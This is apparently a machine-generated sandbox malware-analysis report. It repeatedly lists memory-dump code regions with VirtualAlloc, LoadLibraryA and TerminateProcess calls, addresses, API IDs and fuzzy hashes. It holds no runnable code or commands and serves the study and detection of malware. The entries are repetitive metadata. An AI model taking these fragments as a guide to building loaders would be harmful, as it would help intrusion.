                          • API String ID: 3349790660-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 4f036b1b823f31034d993acbbeb74184a996484b433c5b9e801545db13017105
                          • Instruction ID: 0537057e3d371a759d43b9a71a26d6b211f48032a6c7eac067c08a107780058b
                          • Opcode Fuzzy Hash: 4f036b1b823f31034d993acbbeb74184a996484b433c5b9e801545db13017105
                          • Instruction Fuzzy Hash: D8916DD5A2E703C5E49361B000D55715090EEE73595B38BBB6B23728C2A33E579B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
